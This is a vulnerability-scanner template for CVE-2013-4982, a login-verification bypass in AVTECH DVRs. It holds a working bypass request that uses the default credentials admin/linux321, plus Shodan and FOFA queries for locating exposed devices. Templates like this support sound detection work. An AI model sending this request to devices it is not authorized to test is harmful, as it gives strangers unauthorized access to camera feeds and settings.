id: CVE-2013-4982

info:
  name: AVTECH DVR - Login Verification Code Bypass
  author: ritikchaddha
  severity: low
  description: |
    AVTECH DVR products are vulnerable to verification code bypass just by entering the "login=quick" parameter to bypass verification code.
  impact: |
    Attackers can bypass authentication mechanisms and gain unauthorized access to the DVR system, potentially viewing camera feeds, modifying settings, or compromising the device.
  remediation: |
    Update to the latest firmware version or contact the vendor for a security patch.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2013-4982
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5.0
    cve-id: CVE-2013-4982
    epss-score: 0.39617
    epss-percentile: 0.97391
    cwe-id: CWE-287
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"login" product:"Avtech"
    fofa-query: app="AVTECH-视频监控"
  tags: cve,cve2013,avtech,verify,bypass,iot,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/nobody/VerifyCode.cgi?account={{base64(username + ':' + password)}}&login=quick"

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - linux321

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "^0.*\nOK.*"

      - type: dsl
        dsl:
          - status_code == 200
          - len(body) == 5
        condition: and
# digest: 490a00463044022078e592e2fc6d69b0af554272ed1d86893507805b19443d8ac45a71658f9b644b02202d0794554e8229f60ef7ab9debacfeccbac705b2e3932a76c3ea9834eaf66712:922c64590222798bb761d5b6d8e72950